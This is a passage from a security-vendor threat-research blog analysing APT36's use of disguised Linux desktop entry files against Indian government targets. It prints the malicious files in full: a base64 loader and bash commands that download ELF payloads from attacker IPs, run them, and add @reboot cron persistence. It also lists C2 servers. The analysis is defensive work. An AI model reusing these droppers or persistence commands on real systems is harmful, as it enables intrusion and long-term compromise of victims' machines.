APT36's Updated Arsenal | ThreatLabz
By Sudeep Singh
Published: 2023-09-12 · Archived: 2026-04-02 12:20:45 UTC
Malicious Linux Desktop Entry Files as New Attack Vectors
The utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This
attack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has
discovered three samples - all of which have 0 detection on VirusTotal.
We first observed an occurrence in May 2023 when a credential phishing website used to target Indian
government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious
Linux desktop entry files.
National Informatics Center (NIC), India Phishing Attack - May 2023
In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by
masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May
2023 about this website and the associated threat intel.
We also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL
URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip
URL.
From here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.
Here are some technical details about this case:
ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
ZIP filename: Delegation_Saudi_Arabia.zip
Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
Desktop entry filename: Delegation_Saudi_Arabia.desktop
 
Desktop entry file analysis
We found the following content in the desktop entry file:
 
[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c "echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 1 of 8

yaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g
L3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2
h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It
bWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1
LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn
BkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh"
Terminal=false
Type=Application
Icon=x-office-document
The icon of this desktop entry file is set to "x-office-document" to seem like an innocent Office document.
The base64-encoded command present inside the desktop entry file decodes to:
 
/usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O
/tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185
The command decoded above performs the following actions:
1. Downloads the decoy PDF and saves it in the /tmp directory with the filename: Delegation_Saudi_Arabia.pdf
.
2. Downloads the Linux payload and saves it in the /tmp directory with the filename: 185.elf .
3. Marks the Linux binary as executable.
4. Uses LibreOffice to open and display the decoy PDF file.
5. Executes the Linux payload.
In this case, the Linux payload was a cross-platform binary designed to run on both Linux and WSL (Windows
Subsystem for Linux) machines. Since it did not contain a fully functional C2 mechanism at the time of analysis,
we believe it was still in a development phase and used by the threat actor as an initial test.
To read about “Lee” agent’s cross-platform capabilities, visit the Lumen blog.
The content inside the decoy PDF file is displayed in the image below.
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 2 of 8

Figure 5: Decoy PDF displayed to the user.
The PDF appears to be a document from the Indian Ministry of Defence describing the visit of nine members of a
delegation from Saudi Arabia, where they discussed issues with Indian Armed Forces medical officials.
Inflated File Attack - June 2023
Beginning in June 2023, we detected APT36 establishing their operational infrastructure on a server with the IP
address 153.92.220.59. The threat actor proceeded to register multiple domains hosted on this IP. Further insight
into this attacker-controlled infrastructure is available in the Threat Actor Infrastructure section.
In August, we noted a significant development where few of these domains served as the hosting platform for
decoy PDF files. These PDFs were linked within the malicious Linux desktop entry files, which the threat actor
distributed enclosed in zip archives.
Here are some technical details about this case:
ZIP archive MD5 hash: 36b19ca8737c63b9c9a3365ff4968ef5
ZIP filename: Meeting_agenda.zip
Desktop entry file MD5 hash: 65167974b397493fce320005916a13e9
Desktop entry filename: approved_copy.desktop
 
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 3 of 8

Desktop entry file analysis
The first anomaly we observed was the large size of the Linux desktop entry file. A size larger than 1 MB for a
Linux desktop entry file is rare. Reviewing the file revealed that the threat actor inflated the size of the file by
adding more than a million "#" characters. We believe this was an attempt by the threat actor to bypass security
scanning solutions.
The image below shows the extra characters added to the inflated Linux desktop entry file.
Figure 6: The inflated Linux desktop entry file.
The relevant content from the Linux desktop entry file is shown below.
 
[Desktop Entry]
Type=Application
Name=approved_copy.pdf
Exec=bash -c "xdg-open 'https://admin-dept[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget
64.227.133[.]222/zswap-xbusd -O ~/.local/share/zswap-xbusd && chmod +x ~/.local/share/zswap-xbusd; echo
'@reboot ~/.local/share/zswap-xbusd'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm
/dev/shm/myc.txt; ~/.local/share/zswap-xbusd"
Icon=application-pdf
Name[en_US]=approved_copy.desktop
This desktop file performs these main operations:
1. Downloads the decoy PDF file from the https://admin-dept[.]in/approved_copy.pdf URL and displays it
to the victim. This decoy file contains an error message to distract the user. Figure 7 shows that the icon of
this desktop file is set to application-pdf which is done to disguise the malware as an innocuous file.
2. Creates a hidden directory path called, local/share, in the user's home directory.
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 4 of 8

3. Downloads the Linux payload from the URL  64.227.133[.]222/zswap-xbusd using wget. Saves it as
zswap-xbusd in the previously created hidden directory.
4. Writes a short shell script to the file /dev/shm/myc.txt. The shell script reboots the machine and then
launches the Linux payload. 
5. Sets up a cron job under the current username to run the contents of the /dev/shm/myc.txt script.
6. Deletes the shell script.
7. Executes the Linux payload. 
Figure 7: The icon of the desktop configuration file is set to PDF to make it more convincing.
At the time of our analysis, the server 64.227.133[.]222 was not serving the Linux payload. We continued
monitoring this infrastructure and noticed that on Aug 29, 2023, a new domain called admin-br[.]in was
registered and used to distribute a new Linux desktop entry file. In this instance, we were able to retrieve the
payloads and conclude the threat attribution to APT36.
Here is metadata from the new Linux desktop entry file:
MD5 hash: 574013c4a22ca2d8d8c76e65ef5e8059
Filename: approved_copy.desktop
The relevant content from the Linux desktop entry file is shown below.
 
[Desktop Entry]
Type=Application     
Name=approved_copy.pdf          
Exec=bash -c "xdg-open 'https://admin-br[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 5 of 8

64.227.138[.]127/4200f0916f146d2ac5448e91a3afe1b3/pickle-help -O ~/.local/share/pickle-help && chmod +x
~/.local/share/pickle-help;~/.local/share/pickle-help >/dev/null 2>&1 & sleep 5; wget
134.209.159[.]9/4200f0916f146d2ac5448e91a3afe1b3/ziputils-help -O ~/.local/share/ziputils-help && chmod +x
~/.local/share/ziputils-help; echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt;echo '@reboot
~/.local/share/ziputils-help'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm
/dev/shm/myc.txt;~/.local/share/ziputils-help &"
Icon=application-pdf     
Name[en_US]=approved_copy.desktop
The functionality of this file is similar to the previous Linux desktop entry file. 
The image below shows a decoy PDF file displaying an error message stating “Failed to load the PDF document”.
This is used to distract the user while malicious activities occur in the background.
Figure 8: The decoy PDF file displayed to the user.
In this case, the Linux desktop entry file retrieves the malicious Linux payloads from the servers at:
64.227.138[.]127
134.209.159[.]9 
The two files retrieved are cleverly named to disguise themselves as legitimate software utilities.
Here is the metadata of Linux payloads:
MD5 hash: 98279047a7db080129e5ec84533822ef
Filename: pickle-help
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 6 of 8

MD5 hash: 248d4e6bb0f32afd7a1cfb975910235a
Filename: ziputils-help
A quick technical analysis determined these Linux payloads as Mythic Poseidon binaries. Since Mythic is an
open-source framework that is well-documented on GitHub, we will not explore its technical details in this blog.
The corresponding C2 servers extracted from each malicious Linux payload are listed below.
 
Table 2: C2 servers from malicious Linux payload
C2 IP ADDRESS PORT
108.61.163[.]195 7443
64.176.40[.]100 7443
The C2 panel for Mythic Poseidon can be accessed by visiting the URI path /new/login on the server running at
port 7443. 
For instance, the C2 panel for 108.61.163[.]195 can be accessed at hxxps://108.61.163[.]195:7443/new/login .
Figure 9: The Mythic C2 panel for the Poseidon binary.
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 7 of 8

Explore more Zscaler blogs
Source: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Page 8 of 8